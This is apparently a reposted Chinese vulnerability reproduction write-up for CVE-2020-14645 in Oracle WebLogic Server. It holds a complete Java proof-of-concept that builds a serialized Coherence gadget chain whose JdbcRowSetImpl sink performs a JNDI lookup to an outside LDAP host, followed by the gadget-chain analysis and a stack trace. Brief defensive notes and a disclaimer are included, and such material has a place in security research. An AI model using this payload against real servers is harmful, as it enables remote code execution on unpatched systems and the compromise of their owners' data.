Oracle WebLogic Server :12.2.1.4.0
POC:
import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.util.comparator.ExtractorComparator;
import com.tangosol.util.extractor.UniversalExtractor;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.sql.SQLException;
import java.util.PriorityQueue;
/**
 * Proof-of-concept payload generator for CVE-2020-14645 (Oracle WebLogic Server 12.2.1.4.0,
 * Coherence gadget chain).
 *
 * <p>It serializes a {@link PriorityQueue} whose comparator is a Coherence
 * {@code ExtractorComparator} wrapping a {@code UniversalExtractor}. On deserialization,
 * {@code PriorityQueue.readObject()} runs {@code heapify()}, which invokes the comparator; the
 * extractor then reflectively calls a getter on the queued {@code JdbcRowSetImpl}, whose data
 * source name is a JNDI URL (see the stack trace on the page: getDatabaseMetaData -&gt; connect
 * -&gt; InitialContext.lookup).
 *
 * <p>Defensive notes: the root cause is Java-native deserialization of untrusted input without a
 * class filter. Mitigations are the vendor patch, an {@code ObjectInputFilter} (JEP 290) that
 * rejects the Coherence gadget classes, and blocking outbound LDAP/RMI from application servers;
 * an application server initiating an LDAP connection to an unexpected host is a useful
 * detection signal.
 */
public class cve_2020_14645 {

    /**
     * Sets a field by name via reflection, searching the class and its superclasses.
     *
     * <p>Note: {@link #getField} returns {@code null} when the field is not found anywhere in
     * the hierarchy, so this method then fails with a {@link NullPointerException} rather than
     * a {@link NoSuchFieldException}.
     *
     * @param obj       target instance
     * @param fieldName declared field name (private fields are made accessible)
     * @param value     new value
     * @throws Exception any reflection failure (e.g. IllegalAccessException)
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    /**
     * Looks up a declared field in {@code clazz} or any of its superclasses and makes it
     * accessible.
     *
     * @param clazz     class to start the search in
     * @param fieldName declared field name
     * @return the accessible field, or {@code null} if no class in the hierarchy declares it
     */
    public static Field getField(Class<?> clazz, String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        } catch (NoSuchFieldException var4) {
            // Not declared here: recurse into the superclass; stays null at the top of the chain.
            if (clazz.getSuperclass() != null) {
                field = getField(clazz.getSuperclass(), fieldName);
            }
        }
        return field;
    }

    /**
     * Builds the gadget chain, serializes it to a file and immediately deserializes that file
     * locally, so the chain fires in this JVM (the stack trace on the page was captured this
     * way, ending in {@code main}).
     *
     * @param args unused
     * @throws Exception reflection or I/O failure; the chain itself surfaces as an exception
     *                   thrown out of {@code readObject()}
     */
    public static void main(String[] args) throws Exception {
        // The sink: a JdbcRowSetImpl whose data source name is a JNDI (LDAP) URL. Calling
        // getDatabaseMetaData() on it connects via InitialContext.lookup (see the stack trace).
        JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
        jdbcRowSet.setDataSourceName("ldap://lqvfihdamd.dgrh3.cn");
        // Per the page's analysis of extractComplex(): the extractor reflectively invokes the
        // get/is method derived from m_sName on each compared element; m_aoParam are the call
        // arguments (empty here).
        UniversalExtractor universalExtractor = new UniversalExtractor();
        setFieldValue(universalExtractor, "m_sName", "databaseMetaData");
        setFieldValue(universalExtractor, "m_aoParam", new Object[]{});
        // Wrap the extractor in a comparator; PriorityQueue.readObject() -> heapify() calls it.
        ExtractorComparator extractorComparator = new ExtractorComparator(universalExtractor);
        PriorityQueue priorityQueue = new PriorityQueue(extractorComparator);
        // The backing array and size are written directly instead of via add()/offer(),
        // presumably so the comparator is not run while the payload is being built; two
        // elements are used so that heapify() has something to compare.
        setFieldValue(priorityQueue, "queue", new Object[]{jdbcRowSet, "123"});
        setFieldValue(priorityQueue, "size", 2);
        // Persist the payload. The stream is closed manually; try-with-resources is the idiom.
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("oracle/cve-2020_14645.ser"));
        oos.writeObject(priorityQueue);
        oos.close();
        // Local self-test: reading the file back triggers the chain. Note: ois is never closed.
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("oracle/cve-2020_14645.ser"));
        ois.readObject();
    }
}
利用链:
PriorityQueue.readObject()
PriorityQueue.heapify()
PriorityQueue.siftDown()
PriorityQueue.siftDownUsingComparator()
ExtractorComparator.compare()
UniversalExtractor.extract()
UniversalExtractor.extractComplex()
Method.invoke()
JdbcRowSetImpl.getDatabaseMetaData()
sink:(method.invoke())
com.tangosol.util.extractor.UniversalExtractor#extractComplex()存在反射调用,能够根据m_sName属性值去获取对应的get方法与is方法,例如m_sName为databaseMetaData,那么就会尝试获取对应的getDatabaseMetaData的method并反射调用,参数值也可控,为m_aoParam
source:
到了com.tangosol.util.extractor.UniversalExtractor#extract()就很常见了,com.tangosol.util.comparator.ExtractorComparator.compare() ==> com.tangosol.util.extractor.UniversalExtractor#extract()
其实source都是cve-2020-2883的前半部分
至此,完整的利用链已经完成。
lookup:417, InitialContext (javax.naming)
connect:624, JdbcRowSetImpl (com.sun.rowset)
getDatabaseMetaData:4004, JdbcRowSetImpl (com.sun.rowset)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:497, Method (java.lang.reflect)
extractComplex:432, UniversalExtractor (com.tangosol.util.extractor)
extract:175, UniversalExtractor (com.tangosol.util.extractor)
compare:71, ExtractorComparator (com.tangosol.util.comparator)
siftDownUsingComparator:721, PriorityQueue (java.util)
siftDown:687, PriorityQueue (java.util)
heapify:736, PriorityQueue (java.util)
readObject:795, PriorityQueue (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:497, Method (java.lang.reflect)
invokeReadObject:1058, ObjectStreamClass (java.io)
readSerialData:1900, ObjectInputStream (java.io)
readOrdinaryObject:1801, ObjectInputStream (java.io)
readObject0:1351, ObjectInputStream (java.io)
readObject:371, ObjectInputStream (java.io)
main:63, cve_2020_14645 (cve2020.cve_2020_14645)
原文始发于微信公众号(路旅安全):Weblogic CVE-2020-14645漏洞复现分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。